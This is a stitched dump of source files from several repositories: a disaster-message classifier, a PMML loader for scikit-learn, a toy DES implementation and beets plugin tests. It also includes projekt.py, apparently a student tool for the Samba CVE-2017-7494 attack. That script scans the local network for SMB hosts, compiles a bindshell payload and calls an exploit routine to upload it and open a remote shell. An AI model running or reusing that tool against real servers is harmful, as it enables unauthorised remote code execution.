            # keys must match the FeatureUnion component names, otherwise the weights are silently ignored
            'features__transformer_weights': (
                {'text_pipeline': 1, 'tfidf_transformer': 1, 'starting_verb_extr': 1},
                {'text_pipeline': 0.5, 'tfidf_transformer': 1, 'starting_verb_extr': 0.5},
            )
}
        cv = GridSearchCV(pipeline, param_grid=parameters, cv=3, verbose=2)
return cv
return pipeline
def evaluate_model(model, X_test, Y_test, category_names):
"""
Method applies scikit pipeline to test set and prints the model performance (accuracy and f1score)
Parameters
-----------
model : Pipeline
fit pipeline
X_test : ndarray
test features
Y_test : ndarray
test labels
category_names : list
List of different message categories
Returns
----------
None
"""
Y_pred = model.predict(X_test)
print(classification_report(Y_test, Y_pred, target_names=category_names))
def save_model(model, model_filepath):
"""
Save trained model
Parameters
-----------
model : Pipeline
fit pipeline
model_filepath : str
path with dump format
Returns
----------
None
"""
dump(model, "{}".format(model_filepath))
def main():
"""
Runner function
This function:
1) Extract data from SQLite db
2) Train ML model on training set
3) Estimate model performance on test set
4) Save trained model
"""
if len(sys.argv) == 3:
database_filepath, model_filepath = sys.argv[1:]
print('Loading data...\n DATABASE: {}'.format(database_filepath))
X, Y, category_names = load_data(database_filepath)
X_train, X_test, Y_train, Y_test = train_test_split(X.values, Y.values, test_size=0.2, random_state=42)
print('Building model...')
model = build_model()
print('Training model...')
model.fit(X_train, Y_train)
print('Evaluating model...')
evaluate_model(model, X_test, Y_test, category_names)
print('Saving model...\n MODEL: {}'.format(model_filepath))
save_model(model, model_filepath)
print('Trained model saved!')
else:
print('Please provide the filepath of the disaster messages database '\
'as the first argument and the filepath of the pickle file to '\
'save the model to as the second argument. \n\nExample: python '\
'train_classifier.py ../data/DisasterResponse.db classifier.pkl')
if __name__ == '__main__':
main()
```
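A short sketch of the grid-search path, assuming this module is importable as train_classifier and the DisasterResponse.db produced by the ETL step exists:
```python
from sklearn.model_selection import train_test_split
from train_classifier import build_model, load_data
X, Y, category_names = load_data('../data/DisasterResponse.db')
X_train, X_test, Y_train, Y_test = train_test_split(X.values, Y.values, test_size=0.2)
model = build_model(useGridSearch=True)  # returns a GridSearchCV wrapper
model.fit(X_train, Y_train)
print(model.best_params_)
```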
|
{
"source": "jeenalee/sklearn_pmml",
"score": 3
}
|
#### File: sklearn_pmml/extensions/linear_regression.py
```python
from sklearn.linear_model import LinearRegression
from bs4 import BeautifulSoup
import numpy
def from_pmml(self, pmml):
"""Returns a model with the intercept and coefficients represented in PMML file."""
model = self()
# Reads the input PMML file with BeautifulSoup.
with open(pmml, "r") as f:
lm_soup = BeautifulSoup(f, "xml")
if not lm_soup.RegressionTable:
raise ValueError("RegressionTable not found in the input PMML file.")
else:
        # TODO: consider extracting this intercept-parsing block into its own function
# Pulls out intercept from the PMML file and assigns it to the
# model. If the intercept does not exist, assign it to zero.
intercept = 0
if "intercept" in lm_soup.RegressionTable.attrs:
intercept = lm_soup.RegressionTable['intercept']
model.intercept_ = float(intercept)
# Pulls out coefficients from the PMML file, and assigns them
# to the model.
if not lm_soup.find_all('NumericPredictor'):
raise ValueError("NumericPredictor not found in the input PMML file.")
else:
coefs = []
numeric_predictors = lm_soup.find_all('NumericPredictor')
for i in numeric_predictors:
i_coef = float(i['coefficient'])
coefs.append(i_coef)
model.coef_ = numpy.array(coefs)
return model
# TODO: check input data's X order and rearrange the array
LinearRegression.from_pmml = classmethod(from_pmml)
```
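A hypothetical usage sketch; 'model.pmml' is an assumed file containing a RegressionTable, and the import path mirrors the file location above:
```python
import numpy as np
from sklearn.linear_model import LinearRegression
import sklearn_pmml.extensions.linear_regression  # noqa: F401 -- attaches from_pmml
model = LinearRegression.from_pmml('model.pmml')
print(model.intercept_, model.coef_)
print(model.predict(np.zeros((1, len(model.coef_)))))
```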
|
{
"source": "jeenn85/DES_encryptor",
"score": 2
}
|
#### File: jeenn85/DES_encryptor/des_algorithm.py
```python
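# Initial permutation matrix (IP) applied to each 64-bit data block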
PI = [58, 50, 42, 34, 26, 18, 10, 2,
60, 52, 44, 36, 28, 20, 12, 4,
62, 54, 46, 38, 30, 22, 14, 6,
64, 56, 48, 40, 32, 24, 16, 8,
57, 49, 41, 33, 25, 17, 9, 1,
59, 51, 43, 35, 27, 19, 11, 3,
61, 53, 45, 37, 29, 21, 13, 5,
63, 55, 47, 39, 31, 23, 15, 7]
# Initial key permutation matrix
CP_1 = [57, 49, 41, 33, 25, 17, 9,
1, 58, 50, 42, 34, 26, 18,
10, 2, 59, 51, 43, 35, 27,
19, 11, 3, 60, 52, 44, 36,
63, 55, 47, 39, 31, 23, 15,
7, 62, 54, 46, 38, 30, 22,
14, 6, 61, 53, 45, 37, 29,
21, 13, 5, 28, 20, 12, 4]
# Shifted key permutation matrix to get Ki+1
CP_2 = [14, 17, 11, 24, 1, 5, 3, 28,
15, 6, 21, 10, 23, 19, 12, 4,
26, 8, 16, 7, 27, 20, 13, 2,
41, 52, 31, 37, 47, 55, 30, 40,
51, 45, 33, 48, 44, 49, 39, 56,
34, 53, 46, 42, 50, 36, 29, 32]
# Expanded matrix (48bits after expansion) XORed with Ki
E = [32, 1, 2, 3, 4, 5,
4, 5, 6, 7, 8, 9,
8, 9, 10, 11, 12, 13,
12, 13, 14, 15, 16, 17,
16, 17, 18, 19, 20, 21,
20, 21, 22, 23, 24, 25,
24, 25, 26, 27, 28, 29,
28, 29, 30, 31, 32, 1]
# S-BOXES matrix
S_BOXES = [
[[14, 4, 13, 1, 2, 15, 11, 8, 3, 10, 6, 12, 5, 9, 0, 7],
[0, 15, 7, 4, 14, 2, 13, 1, 10, 6, 12, 11, 9, 5, 3, 8],
[4, 1, 14, 8, 13, 6, 2, 11, 15, 12, 9, 7, 3, 10, 5, 0],
[15, 12, 8, 2, 4, 9, 1, 7, 5, 11, 3, 14, 10, 0, 6, 13],
],
[[15, 1, 8, 14, 6, 11, 3, 4, 9, 7, 2, 13, 12, 0, 5, 10],
[3, 13, 4, 7, 15, 2, 8, 14, 12, 0, 1, 10, 6, 9, 11, 5],
[0, 14, 7, 11, 10, 4, 13, 1, 5, 8, 12, 6, 9, 3, 2, 15],
[13, 8, 10, 1, 3, 15, 4, 2, 11, 6, 7, 12, 0, 5, 14, 9],
],
[[10, 0, 9, 14, 6, 3, 15, 5, 1, 13, 12, 7, 11, 4, 2, 8],
[13, 7, 0, 9, 3, 4, 6, 10, 2, 8, 5, 14, 12, 11, 15, 1],
[13, 6, 4, 9, 8, 15, 3, 0, 11, 1, 2, 12, 5, 10, 14, 7],
[1, 10, 13, 0, 6, 9, 8, 7, 4, 15, 14, 3, 11, 5, 2, 12],
],
[[7, 13, 14, 3, 0, 6, 9, 10, 1, 2, 8, 5, 11, 12, 4, 15],
[13, 8, 11, 5, 6, 15, 0, 3, 4, 7, 2, 12, 1, 10, 14, 9],
[10, 6, 9, 0, 12, 11, 7, 13, 15, 1, 3, 14, 5, 2, 8, 4],
[3, 15, 0, 6, 10, 1, 13, 8, 9, 4, 5, 11, 12, 7, 2, 14],
],
[[2, 12, 4, 1, 7, 10, 11, 6, 8, 5, 3, 15, 13, 0, 14, 9],
[14, 11, 2, 12, 4, 7, 13, 1, 5, 0, 15, 10, 3, 9, 8, 6],
[4, 2, 1, 11, 10, 13, 7, 8, 15, 9, 12, 5, 6, 3, 0, 14],
[11, 8, 12, 7, 1, 14, 2, 13, 6, 15, 0, 9, 10, 4, 5, 3],
],
[[12, 1, 10, 15, 9, 2, 6, 8, 0, 13, 3, 4, 14, 7, 5, 11],
[10, 15, 4, 2, 7, 12, 9, 5, 6, 1, 13, 14, 0, 11, 3, 8],
[9, 14, 15, 5, 2, 8, 12, 3, 7, 0, 4, 10, 1, 13, 11, 6],
[4, 3, 2, 12, 9, 5, 15, 10, 11, 14, 1, 7, 6, 0, 8, 13],
],
[[4, 11, 2, 14, 15, 0, 8, 13, 3, 12, 9, 7, 5, 10, 6, 1],
[13, 0, 11, 7, 4, 9, 1, 10, 14, 3, 5, 12, 2, 15, 8, 6],
[1, 4, 11, 13, 12, 3, 7, 14, 10, 15, 6, 8, 0, 5, 9, 2],
[6, 11, 13, 8, 1, 4, 10, 7, 9, 5, 0, 15, 14, 2, 3, 12],
],
[[13, 2, 8, 4, 6, 15, 11, 1, 10, 9, 3, 14, 5, 0, 12, 7],
[1, 15, 13, 8, 10, 3, 7, 4, 12, 5, 6, 11, 0, 14, 9, 2],
[7, 11, 4, 1, 9, 12, 14, 2, 0, 6, 10, 13, 15, 3, 5, 8],
[2, 1, 14, 7, 4, 10, 8, 13, 15, 12, 9, 0, 3, 5, 6, 11],
]
]
# Permutation matrix following each S-BOX substitution for each round
P = [16, 7, 20, 21, 29, 12, 28, 17,
1, 15, 23, 26, 5, 18, 31, 10,
2, 8, 24, 14, 32, 27, 3, 9,
19, 13, 30, 6, 22, 11, 4, 25]
# Final permutation matrix of data after the 16 rounds
PI_1 = [40, 8, 48, 16, 56, 24, 64, 32,
39, 7, 47, 15, 55, 23, 63, 31,
38, 6, 46, 14, 54, 22, 62, 30,
37, 5, 45, 13, 53, 21, 61, 29,
36, 4, 44, 12, 52, 20, 60, 28,
35, 3, 43, 11, 51, 19, 59, 27,
34, 2, 42, 10, 50, 18, 58, 26,
33, 1, 41, 9, 49, 17, 57, 25]
# Matrix determining the shift for each round of keys
ROUND_KEY_SHIFT = [1, 1, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 1]
ENCRYPTION = 1
DECRYPTION = 0
def string_to_bit_array(text):
"""Convert the string into a list of bits."""
array = list()
for char in text:
bin_val = bin_value(char, 8) # Get value of char in one byte
array.extend([int(x) for x in list(bin_val)]) # Add the bits to the list
return array
def bit_array_to_string(array):
"""Transform bit array to string."""
result_string = ''.join(
[chr(int(i, 2)) for i in
[''.join([str(x) for x in s_bytes])
for s_bytes in split_into_n(array, 8)]]
)
return result_string
def bin_value(val, bit_size):
"""Return the binary value as a string of the given size."""
bin_val = bin(val)[2:] if isinstance(val, int) else bin(ord(val))[2:]
if len(bin_val) > bit_size:
raise "Binary value larger than expected!"
while len(bin_val) < bit_size:
bin_val = "0" + bin_val # Add 0s to satisfy size
return bin_val
def split_into_n(s, n):
"""Split into lists - each of size 'n'."""
return [s[k:k + n] for k in range(0, len(s), n)]
class Des:
def __init__(self):
self.text = None
self.passwd = None
self.keys = list()
def run(self, key, text, action=ENCRYPTION, padding=False):
"""Run the DES algorithm."""
self.text = text
self.passwd = key
if padding and action == ENCRYPTION:
self.add_padding()
        elif len(self.text) % 8 != 0:  # Without padding, the data size must be a multiple of 8 bytes
            raise ValueError("Data size should be a multiple of 8 bytes")
self.generate_keys() # Generate all the keys
text_blocks = split_into_n(self.text, 8) # Split the text in blocks of 8 bytes so 64 bits
result = list()
for block in text_blocks: # Loop over all the blocks of data
block = string_to_bit_array(block) # Convert the block in bit array
block = self.permutation(block, PI) # Apply the initial permutation
L, R = split_into_n(block, 32) # L(LEFT), R(RIGHT)
temp = None
for i in range(16): # Perform 16 rounds
d_e = self.expansion(R, E) # Expand R to 48 bits
if action == ENCRYPTION:
temp = self.xor(self.keys[i], d_e) # Use the Ki when encrypting
else:
temp = self.xor(self.keys[15 - i], d_e) # Use the last key when decrypting
temp = self.substitute(temp) # Apply the S-BOXES
temp = self.permutation(temp, P)
temp = self.xor(L, temp)
L = R
R = temp
result += self.permutation(R + L, PI_1) # Perform the last permutation & append the RIGHT to LEFT
final_res = bit_array_to_string(result)
if padding and action == DECRYPTION:
return self.remove_padding(final_res) # Remove the padding if decrypting and padding is used
else:
return final_res # Return the final string of processed data
def substitute(self, d_e):
"""Substitute bytes using S-BOXES."""
sub_blocks = split_into_n(d_e, 6) # Split bit array into sub_blocks of 6 bits each
result = list()
for i in range(len(sub_blocks)): # For all the sub_blocks
block = sub_blocks[i]
row = int(str(block[0]) + str(block[5]), 2) # Find row with the first & last bit
column = int(''.join([str(x) for x in block[1:][:-1]]), 2) # Column value based on 2nd, 3rd, 4th & 5th bit
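            # e.g. block [0, 1, 1, 0, 1, 1]: row = 0b01 = 1, column = 0b1101 = 13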
val = S_BOXES[i][row][column] # Resulting value in the S-BOX for specific round
bin = bin_value(val, 4) # Convert decimal value to binary
result += [int(x) for x in bin] # Append the binary to the resulting list
return result
def permutation(self, block, table):
"""Perform permutation of the given block using the given table."""
return [block[x - 1] for x in table]
def expansion(self, block, table):
"""Perform expansion of d to mach the size of Ki (48 bits)."""
return [block[x - 1] for x in table]
def xor(self, t1, t2):
"""Perform XOR & return the list."""
return [x ^ y for x, y in zip(t1, t2)]
def generate_keys(self):
"""Generate all the keys."""
self.keys = []
key = string_to_bit_array(self.passwd)
key = self.permutation(key, CP_1) # Perform initial permutation on the key
g, d = split_into_n(key, 28) # Split into g (LEFT) & d (RIGHT)
for i in range(16): # Apply the 16 rounds
g, d = self.shift(g, d, ROUND_KEY_SHIFT[i]) # Shift the key according to the round
tmp = g + d # Merge them
self.keys.append(self.permutation(tmp, CP_2)) # Perform the permutation to get the Ki
def shift(self, g, d, n):
"""Shift a list of the given value."""
return g[n:] + g[:n], d[n:] + d[:n]
def add_padding(self):
"""Add padding to the data according to PKCS5 specification."""
pad_len = 8 - (len(self.text) % 8)
self.text += pad_len * chr(pad_len)
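        # e.g. 5 bytes of data receive three padding bytes, each of value 0x03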
def remove_padding(self, data):
"""Remove the padding from the data."""
pad_len = ord(data[-1])
return data[:-pad_len]
def encrypt(self, key, text, padding=True):
"""Perform encryption."""
return self.run(key, text, ENCRYPTION, padding)
def decrypt(self, key, text, padding=True):
"""Perform decryption."""
return self.run(key, text, DECRYPTION, padding)
if __name__ == '__main__':
# des_algorithm.py executed as script
print("Nothing to execute!")
```
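A minimal round-trip sketch for the Des class above, assuming des_algorithm.py is on the import path:
```python
from des_algorithm import Des
key = "8bytekey"  # the key must be exactly 8 bytes
cipher = Des().encrypt(key, "secret message", padding=True)
plain = Des().decrypt(key, cipher, padding=True)
assert plain == "secret message"
```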
#### File: DES_encryptor/file_handling/file_input.py
```python
def text_or_file():
"""Load from file or input manually."""
while True:
load_choice = input("Enter X to enter text manually or F to load from file.")
if load_choice == "F":
return "Y"
elif load_choice == "X":
return "N"
else:
print("Wrong input! Please try again.\n")
def load_file(mode, l_file):
"""Decide which file should be loaded."""
if l_file == "Y":
while True:
file_name = input("Enter the name of file you want to load:")
user_file = open("{}".format(file_name), "r")
if mode == "D": # Reading bytes - converting to string /// not working - encrypted only ///
utf_cont = user_file.read()
cont = str(utf_cont)
else:
cont = user_file.read()
user_file.close()
if len(cont) < 8 and mode == "D":
print("Cannot decrypt less than 8 bytes!")
else:
return cont
elif l_file == "N":
return "N"
else:
print("Wrong input! Please try again.\n")
if __name__ == '__main__':
# file_input.py executed as script
print("Nothing to execute!")
```
#### File: DES_encryptor/user_and_key_io/key_io.py
```python
def key_input():
"""
Enter key to be used.
Don't accept key shorter than 8 bytes.
If key is longer than 8 bytes, cut it to 8 bytes.
"""
while True:
key = input("Enter 8 byte key:")
if len(key) < 8:
print("Key should be 8 bytes long!")
elif len(key) > 8:
key = key[:8] # If entered key is too long, cut to 8 bytes
print("Entered key cut to 8 bytes: '{}' was used as a key.".format(key))
return key
else:
return key
def key_output(mode, used_key):
"""
Return the key used for encryption or decryption,
based on mode that was used.
"""
if mode == "E":
return print("Key used for encryption was: '{}'.".format(used_key))
else:
return print("Key used for decryption was: '{}'.".format(used_key))
def keys_output(mode, used_key_one, used_key_two, used_key_three):
"""
Return the keys used for encryption or decryption,
based on mode that was used.
"""
if mode == "E":
return print("Keys used for encryption were: '{}', '{}', '{}'.".format(
used_key_one, used_key_two, used_key_three)
)
else:
return print("Keys used for decryption were: '{}', '{}', '{}'.".format(
used_key_one, used_key_two, used_key_three)
)
if __name__ == '__main__':
# key_io.py executed as script
print("Nothing to execute!")
```
|
{
"source": "jeenn85/Eternalred_ZIC1",
"score": 2
}
|
#### File: jeenn85/Eternalred_ZIC1/projekt.py
```python
import subprocess
import nmap
import os
import netifaces
import ipaddress
import platform
from exploitsambacry import SambaCry
import time
from impacket.smbconnection import *
from impacket.dcerpc.v5 import transport, srvs
REMOTE_SHELL_PORT = 6699
SMB_PORT = 445
IPV6 = False
def get_ip(v6=False):
"""
    Walks through all network interfaces of the machine and returns all active IP addresses including the network mask. Does not return the localhost address!
    NOTE: IPv6 addresses are not handled yet
    :param v6: True / False - whether to collect IPv6 addresses (not working yet)
    :return: Returns a <list> of active IP addresses including the network mask
"""
ip_list = []
interfaces = netifaces.interfaces()
for i in interfaces:
if i == 'lo':
continue
if v6:
iface = netifaces.ifaddresses(i).get(netifaces.AF_INET6)
else:
iface = netifaces.ifaddresses(i).get(netifaces.AF_INET)
if iface is not None:
for j in iface:
cur_ip = j['addr']
cur_mask = j['netmask']
append = False
if v6:
                    append = False  # IPv6 is not supported yet
else:
if not cur_ip.startswith('127.') and not cur_ip.startswith('169.254'):
append = True
if append:
ip = ipaddress.IPv4Interface(cur_ip + "/" + cur_mask)
ip_list.append(ip)
return ip_list
def get_available_smb(ip, port="445"):
"""
    Looks for hosts with the given ports open and lists them together with
    protocol details. Then lets the user pick the IP address of a host on the
    network whose open-port service is named netbios-ssn.
    :param ip: Network address including netmask, e.g. 192.168.1.0/24
    :param port: ports to scan
    :return: IP address of the selected server, or -1 on failure
"""
ns = nmap.PortScanner()
ns.scan(ip, port)
print "[?] Vyber Samba server "
i = 0
all_host = ns.all_hosts()
filtered = []
for host in all_host:
if (ns[host]['tcp'][SMB_PORT]['state']) == "open" and ns[host]['tcp'][SMB_PORT]['name'] == "netbios-ssn":
i += 1
print " [", i, "]", host, "\t", ns[host].hostname(), "\t protokol: ", ns[host]['tcp'][SMB_PORT]['name'], "\t status: ", ns[host]['tcp'][SMB_PORT]['state'], "\t verze: ", ns[host]['tcp'][SMB_PORT]['version']
filtered.append(host)
else:
print "\033[35m [ ]", host, "\t", ns[host].hostname(), "\t protokol: ", ns[host]['tcp'][SMB_PORT]['name'], "\t status: ", ns[host]['tcp'][SMB_PORT]['state'], "\t verze: ", ns[host]['tcp'][SMB_PORT]['version'], "\033[0m"
# print(ns.csv())
if len(filtered) != 0:
user_select = int_input_countdown(i)
return filtered[user_select-1]
else:
print "[!] Zadny Samba server k dispozici "
return -1
def compile_payload(payload):
"""
    Detects the OS type and, on Linux, compiles the payload. Does not check
    for gcc availability; failures are handled by the exception.
    :param payload: Name of the source-code file to compile
    :return: 0 = compiled successfully, -1 = failure
"""
os_type = platform.system()
if os_type == "Linux":
try:
subprocess.Popen(["gcc", "-shared", "-o", "libpayload.so", "-fPIC", payload], stdout=subprocess.PIPE)
time.sleep(3)
except Exception as e:
print "[-] Exception " + str(e)
return -1
return 0
elif os_type == "Windows":
print "[!] Windows zatim neni podporovan"
return - 1
else:
print "[!] Nepodporovany OS"
return - 1
def payload_list(path):
"""
    Walks the given directory and returns all files with the .c extension.
    :param path: path to the directory to search
    :return: <list> of available files with the .c extension
"""
files = []
    # r = root, d = directories, f = files
for file in os.listdir(path):
if ".c" in file:
files.append(file)
return files
def input_to_int(usr_input):
"""
    Tests whether the user-supplied input is a number. If so, returns it.
    :param usr_input: user input
    :return: user input converted to int, or -1 on failure
"""
try:
value = int(usr_input)
except ValueError:
return -1
if value <= 0:
return -1
return value
def int_input_countdown(i):
"""
Umoznuje uzivately zadat hodnotu typu int v rozsahu 0-i. V pripade, ze 20x zada spatnou volbu, ukonci program.
:param i: Definuje maximalni povolenou hodnotu uzivatelskeho vstupu
:return: Vraci zvolenou hodnotu z povoleneho rozsahu.
"""
print ">> "
j = -20
while j < 0:
if j == 0:
print "[!] 20x jsi nezadal cislo od 1 do", i, ", koncim!"
exit - 1
try:
usr_input = input()
value = input_to_int(usr_input)
except Exception as e:
value = -1
return value
if 0 < value <= i:
return value
print "[i] Zadej cislo od 1 do ", i
j += 1
def print_from_list(list):
"""
    Prints the contents of the given list.
    :param list: list to print
    :return: number of items in the list
"""
i = 0
for f in list:
i += 1
print " [", i, "]", f
return i
def smb_share_information(target, port, user=None, password=None):
    """
    Looks up the shared folders of the given host.
    :param target: Host IP
    :param port: Host port
    :param user: Username
    :param password: Password
    :return: <list> with the names of the shared folders
"""
try:
conn = SMBConnection(target, target, sess_port=port)
except socket.error as error:
print "[-] Chyba spojeni", error.message
return
    if not conn.login(user, password):
        raise Exception("[-] Authentication error, invalid username or password")
rpc_transport = transport.SMBTransport(
conn.getRemoteName(), conn.getRemoteHost(), filename=r'\srvsvc', smb_connection=conn
)
dce = rpc_transport.get_dce_rpc()
try:
dce.connect()
except SessionError as error:
pass
dce.bind(srvs.MSRPC_UUID_SRVS)
resp = srvs.hNetrShareEnum(dce, 2)
share_path = []
ignore_shares = ["print$", "IPC$"]
for share in resp['InfoStruct']['ShareInfo']['Level2']['Buffer']:
share_name = share['shi2_netname'][:-1]
if share_name not in ignore_shares:
share_path.append(share_name)
return share_path
ipv4 = "0.0.0.0/0"
usr_name = "sambacry"
usr_passwd = "<PASSWORD>"
if __name__ == "__main__":
print """
______ _ _ _____ _
| ____| | | | __ \\ | |
| |__ | |_ ___ _ __ _ __ __ _| | |__) |___ __| |
| __| | __/ _ \\ '__| '_ \\ / _` | | _ // _ \\/ _` |
| |____| || __/ | | | | | (_| | | | \\ \\ __/ (_| |
|______|\\__\\___|_| |_| |_|\\__,_|_|_| \\_\\___|\\__,_|
"""
print(" ---CVE-2017-7494---\n\n")
print "[+] Zjistuji IP adresy "
my_ip_list = get_ip(IPV6)
print "[i] Dostupne IP adresy: "
print_from_list(my_ip_list)
if len(my_ip_list) == 1:
ipv4 = str(ipaddress.IPv4Interface(my_ip_list[0]).network)
elif len(my_ip_list) > 1:
print "[?] Vyber sit k prohledani: "
i = 0
for f in my_ip_list:
i += 1
print " [", i, "]", str(ipaddress.IPv4Interface(f).network)
value = int_input_countdown(i)
ipv4 = str(ipaddress.IPv4Interface(my_ip_list[value]).network)
else:
exit(-1)
print "[+] Hledam Smb Server v siti " + ipv4 + ":"
my_smb_server = get_available_smb(ipv4, str(SMB_PORT))
if my_smb_server == -1:
exit(-1)
shares = smb_share_information(my_smb_server, SMB_PORT, usr_name, usr_passwd)
if len(shares) == 1:
shared_folder = shares[0]
elif len(shares) > 1:
print "[?] Vyber sdilenou slozku "
i = print_from_list(shares)
value = int_input_countdown(i)
shared_folder = shares[i]
else:
exit(-1)
print "[?] Vyber Payload "
files = payload_list(os.getcwd())
i = print_from_list(files)
value = int_input_countdown(i)
if files[value-1] == "bindshell-samba.c":
shell_port = REMOTE_SHELL_PORT
else:
shell_port = None
print "[+] Kompiluji Payload "
if compile_payload(files[value-1]) != 0:
print "[-] Nelze zkompilovat "
exit(-1)
print "[+] Nahravam Payload "
SambaCry.exploit(my_smb_server, SMB_PORT, "libpayload.so", shared_folder, "/" + shared_folder + "/libpayload.so", usr_name, usr_passwd, shell_port)
```
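The SMB discovery step above boils down to the following python-nmap sketch (Python 3 here for brevity; assumes the `python-nmap` package and the `nmap` binary are installed, and the subnet is a placeholder):
```python
import nmap

ns = nmap.PortScanner()
ns.scan("192.168.1.0/24", "445")  # placeholder subnet, SMB port only
for host in ns.all_hosts():
    info = ns[host].get("tcp", {}).get(445)
    if info and info["state"] == "open" and info["name"] == "netbios-ssn":
        print(host, "looks like a Samba server")
```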
|
{
"source": "jee-r/beets-extrafiles",
"score": 2
}
|
#### File: beets-extrafiles/tests/test_extrafiles.py
```python
import logging
import os
import shutil
import tempfile
import unittest.mock
import beets.util.confit
import beetsplug.extrafiles
RSRC = os.path.join(os.path.dirname(__file__), 'rsrc')
log = logging.getLogger('beets')
log.propagate = True
log.setLevel(logging.DEBUG)
class BaseTestCase(unittest.TestCase):
"""Base testcase class that sets up example files."""
PLUGIN_CONFIG = {
'extrafiles': {
'patterns': {
'log': ['*.log'],
'cue': ['*.cue', '*/*.cue'],
'artwork': ['scans/', 'Scans/', 'artwork/', 'Artwork/'],
},
'paths': {
'artwork': '$albumpath/artwork',
'log': '$albumpath/audio',
},
},
}
def _create_example_file(self, *path):
open(os.path.join(*path), mode='w').close()
def _create_artwork_files(self, *path):
artwork_path = os.path.join(*path)
os.mkdir(artwork_path)
for filename in ('front.jpg', 'back.jpg'):
self._create_example_file(artwork_path, filename)
def setUp(self):
"""Set up example files and instanciate the plugin."""
self.srcdir = tempfile.TemporaryDirectory(suffix='src')
self.dstdir = tempfile.TemporaryDirectory(suffix='dst')
# Create example files for single directory album
os.makedirs(os.path.join(self.dstdir.name, 'single'))
sourcedir = os.path.join(self.srcdir.name, 'single')
os.makedirs(sourcedir)
shutil.copy(
os.path.join(RSRC, 'full.mp3'),
os.path.join(sourcedir, 'file.mp3'),
)
for filename in ('file.cue', 'file.txt', 'file.log'):
self._create_example_file(sourcedir, filename)
self._create_artwork_files(sourcedir, 'scans')
# Create example files for multi-directory album
os.makedirs(os.path.join(self.dstdir.name, 'multiple'))
sourcedir = os.path.join(self.srcdir.name, 'multiple')
os.makedirs(os.path.join(sourcedir, 'CD1'))
shutil.copy(
os.path.join(RSRC, 'full.mp3'),
os.path.join(sourcedir, 'CD1', 'file.mp3'),
)
os.makedirs(os.path.join(sourcedir, 'CD2'))
shutil.copy(
os.path.join(RSRC, 'full.mp3'),
os.path.join(sourcedir, 'CD2', 'file.mp3'),
)
for filename in ('file.txt', 'file.log'):
self._create_example_file(sourcedir, filename)
for discdir in ('CD1', 'CD2'):
self._create_example_file(sourcedir, discdir, 'file.cue')
self._create_artwork_files(sourcedir, 'scans')
# Set up plugin instance
config = beets.util.confit.RootView(sources=[
beets.util.confit.ConfigSource.of(self.PLUGIN_CONFIG),
])
with unittest.mock.patch(
'beetsplug.extrafiles.beets.plugins.beets.config', config,
):
self.plugin = beetsplug.extrafiles.ExtraFilesPlugin('extrafiles')
def tearDown(self):
"""Remove the example files."""
self.srcdir.cleanup()
self.dstdir.cleanup()
class MatchPatternsTestCase(BaseTestCase):
"""Testcase that checks if all extra files are matched."""
def testMatchPattern(self):
"""Test if extra files are matched in the media file's directory."""
sourcedir = os.path.join(self.srcdir.name, 'single')
files = set(
(beets.util.displayable_path(path), category)
for path, category in self.plugin.match_patterns(source=sourcedir)
)
expected_files = set([
(os.path.join(sourcedir, 'scans/'), 'artwork'),
(os.path.join(sourcedir, 'file.cue'), 'cue'),
(os.path.join(sourcedir, 'file.log'), 'log'),
])
assert files == expected_files
class MoveFilesTestCase(BaseTestCase):
"""Testcase that moves files."""
def testMoveFilesSingle(self):
"""Test if extra files are moved for single directory imports."""
sourcedir = os.path.join(self.srcdir.name, 'single')
destdir = os.path.join(self.dstdir.name, 'single')
# Move file
source = os.path.join(sourcedir, 'file.mp3')
destination = os.path.join(destdir, 'moved_file.mp3')
item = beets.library.Item.from_path(source)
shutil.move(source, destination)
self.plugin.on_item_moved(
item, beets.util.bytestring_path(source),
beets.util.bytestring_path(destination),
)
self.plugin.on_cli_exit(None)
# Check source directory
assert os.path.exists(os.path.join(sourcedir, 'file.txt'))
assert not os.path.exists(os.path.join(sourcedir, 'file.cue'))
assert not os.path.exists(os.path.join(sourcedir, 'file.log'))
assert not os.path.exists(os.path.join(sourcedir, 'audio.log'))
assert not os.path.exists(os.path.join(sourcedir, 'artwork'))
assert not os.path.exists(os.path.join(sourcedir, 'scans'))
# Check destination directory
assert not os.path.exists(os.path.join(destdir, 'file.txt'))
assert os.path.exists(os.path.join(destdir, 'file.cue'))
assert not os.path.exists(os.path.join(destdir, 'file.log'))
assert os.path.exists(os.path.join(destdir, 'audio.log'))
assert not os.path.isdir(os.path.join(destdir, 'scans'))
assert os.path.isdir(os.path.join(destdir, 'artwork'))
assert (set(os.listdir(os.path.join(destdir, 'artwork'))) ==
set(('front.jpg', 'back.jpg')))
def testMoveFilesMultiple(self):
"""Test if extra files are moved for multi-directory imports."""
sourcedir = os.path.join(self.srcdir.name, 'multiple')
destdir = os.path.join(self.dstdir.name, 'multiple')
# Move first file
source = os.path.join(sourcedir, 'CD1', 'file.mp3')
destination = os.path.join(destdir, '01 - moved_file.mp3')
item = beets.library.Item.from_path(source)
shutil.move(source, destination)
self.plugin.on_item_moved(
item, beets.util.bytestring_path(source),
beets.util.bytestring_path(destination),
)
# Move second file
source = os.path.join(sourcedir, 'CD2', 'file.mp3')
destination = os.path.join(destdir, '02 - moved_file.mp3')
item = beets.library.Item.from_path(source)
shutil.move(source, destination)
self.plugin.on_item_moved(
item, beets.util.bytestring_path(source),
beets.util.bytestring_path(destination),
)
self.plugin.on_cli_exit(None)
# Check source directory
assert os.path.exists(os.path.join(sourcedir, 'file.txt'))
assert not os.path.exists(os.path.join(sourcedir, 'CD1', 'file.cue'))
assert not os.path.exists(os.path.join(sourcedir, 'CD2', 'file.cue'))
assert not os.path.exists(os.path.join(sourcedir, 'file.log'))
assert not os.path.exists(os.path.join(sourcedir, 'audio.log'))
assert not os.path.exists(os.path.join(sourcedir, 'artwork'))
assert not os.path.exists(os.path.join(sourcedir, 'scans'))
# Check destination directory
assert not os.path.exists(os.path.join(destdir, 'file.txt'))
assert not os.path.exists(os.path.join(sourcedir, 'CD1_file.cue'))
assert not os.path.exists(os.path.join(sourcedir, 'CD2_file.cue'))
assert not os.path.exists(os.path.join(destdir, 'file.log'))
assert os.path.exists(os.path.join(destdir, 'audio.log'))
assert not os.path.isdir(os.path.join(destdir, 'scans'))
assert os.path.isdir(os.path.join(destdir, 'artwork'))
assert (set(os.listdir(os.path.join(destdir, 'artwork'))) ==
set(('front.jpg', 'back.jpg')))
class CopyFilesTestCase(BaseTestCase):
"""Testcase that copies files."""
def testCopyFilesSingle(self):
"""Test if extra files are copied for single directory imports."""
sourcedir = os.path.join(self.srcdir.name, 'single')
destdir = os.path.join(self.dstdir.name, 'single')
# Copy file
source = os.path.join(sourcedir, 'file.mp3')
